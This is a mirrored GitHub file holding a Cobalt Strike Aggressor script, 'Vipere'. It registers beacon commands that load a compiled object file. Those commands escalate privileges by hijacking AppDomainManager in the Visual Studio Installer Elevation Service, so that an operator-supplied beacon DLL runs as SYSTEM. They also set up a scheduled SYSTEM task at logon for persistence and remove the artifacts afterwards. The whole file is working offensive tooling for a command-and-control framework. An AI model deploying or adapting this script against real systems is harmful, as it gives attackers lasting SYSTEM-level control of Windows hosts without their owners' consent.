mirror of
https://github.com/0xaled/Vipere
synced 2026-08-05 20:43:56 +00:00
119 lines
3.6 KiB
Plaintext
119 lines
3.6 KiB
Plaintext
# Vipere - VS Installer LPE via AppDomainManager Hijacking
|
|
# CobaltStrike Aggressor Script
|
|
|
|
beacon_command_register(
|
|
"vipere-check",
|
|
"Detect service + persistence state",
|
|
"Synopsis: vipere-check\n\nDetects VS Installer Elevation Service state and persistence artifacts.\nNo arguments required."
|
|
);
|
|
|
|
beacon_command_register(
|
|
"vipere-prepare",
|
|
"Download VS Installer from microsoft.com",
|
|
"Synopsis: vipere-prepare\n\nDownloads vs_BuildTools.exe from aka.ms and registers the service.\nRequires: Admin, Internet access."
|
|
);
|
|
|
|
beacon_command_register(
|
|
"vipere-exploit",
|
|
"AppDomainManager hijack service -> SYSTEM",
|
|
"Synopsis: vipere-exploit /path/to/beacon.dll\n\nDeploys AppDomainManager hijack on the VS Installer service.\nLoads beacon DLL as SYSTEM via LoadLibrary in-process.\nRequires: Admin, service must exist."
|
|
);
|
|
|
|
beacon_command_register(
|
|
"vipere-persist",
|
|
"Scheduled task + AppDomainManager persistence",
|
|
"Synopsis: vipere-persist /path/to/beacon.dll\n\nCopies vs_installershell.exe to ProgramData, deploys AppDomainManager chain,\ncreates scheduled task (logon trigger, runs as SYSTEM).\nRequires: Admin."
|
|
);
|
|
|
|
beacon_command_register(
|
|
"vipere-full",
|
|
"Full auto: prepare + exploit + persist",
|
|
"Synopsis: vipere-full /path/to/beacon.dll\n\nOne-shot: downloads VS Installer, deploys AppDomainManager hijack,\ncreates persistence. Beacon loaded as SYSTEM.\nRequires: Admin, Internet access."
|
|
);
|
|
|
|
beacon_command_register(
|
|
"vipere-cleanup",
|
|
"Stop service + remove all artifacts + restore originals",
|
|
"Synopsis: vipere-cleanup\n\nStops service, kills persist process, removes all dropped files,\nrestores original .config from backup.\nRequires: Admin."
|
|
);
|
|
|
|
sub _vipere_bof {
|
|
local('$handle $data');
|
|
$handle = openf(script_resource("dist/lpe_vs_bootstrap.x64.o"));
|
|
$data = readb($handle, -1);
|
|
closef($handle);
|
|
return $data;
|
|
}
|
|
|
|
alias vipere-check {
|
|
local('$data $args');
|
|
$data = _vipere_bof();
|
|
$args = bof_pack($1, "z", "check");
|
|
beacon_inline_execute($1, $data, "go", $args);
|
|
}
|
|
|
|
alias vipere-prepare {
|
|
local('$data $args');
|
|
$data = _vipere_bof();
|
|
$args = bof_pack($1, "z", "prepare");
|
|
beacon_inline_execute($1, $data, "go", $args);
|
|
}
|
|
|
|
alias vipere-exploit {
|
|
local('$data $args $dll_handle $dll_data');
|
|
|
|
if ($2 eq "") {
|
|
berror($1, "Usage: vipere-exploit /path/to/beacon.dll");
|
|
return;
|
|
}
|
|
|
|
$dll_handle = openf($2);
|
|
$dll_data = readb($dll_handle, -1);
|
|
closef($dll_handle);
|
|
|
|
$data = _vipere_bof();
|
|
$args = bof_pack($1, "zb", "exploit", $dll_data);
|
|
beacon_inline_execute($1, $data, "go", $args);
|
|
}
|
|
|
|
alias vipere-persist {
|
|
local('$data $args $dll_handle $dll_data');
|
|
|
|
if ($2 eq "") {
|
|
berror($1, "Usage: vipere-persist /path/to/beacon.dll");
|
|
return;
|
|
}
|
|
|
|
$dll_handle = openf($2);
|
|
$dll_data = readb($dll_handle, -1);
|
|
closef($dll_handle);
|
|
|
|
$data = _vipere_bof();
|
|
$args = bof_pack($1, "zb", "persist", $dll_data);
|
|
beacon_inline_execute($1, $data, "go", $args);
|
|
}
|
|
|
|
alias vipere-full {
|
|
local('$data $args $dll_handle $dll_data');
|
|
|
|
if ($2 eq "") {
|
|
berror($1, "Usage: vipere-full /path/to/beacon.dll");
|
|
return;
|
|
}
|
|
|
|
$dll_handle = openf($2);
|
|
$dll_data = readb($dll_handle, -1);
|
|
closef($dll_handle);
|
|
|
|
$data = _vipere_bof();
|
|
$args = bof_pack($1, "zb", "full", $dll_data);
|
|
beacon_inline_execute($1, $data, "go", $args);
|
|
}
|
|
|
|
alias vipere-cleanup {
|
|
local('$data $args');
|
|
$data = _vipere_bof();
|
|
$args = bof_pack($1, "z", "cleanup");
|
|
beacon_inline_execute($1, $data, "go", $args);
|
|
}
|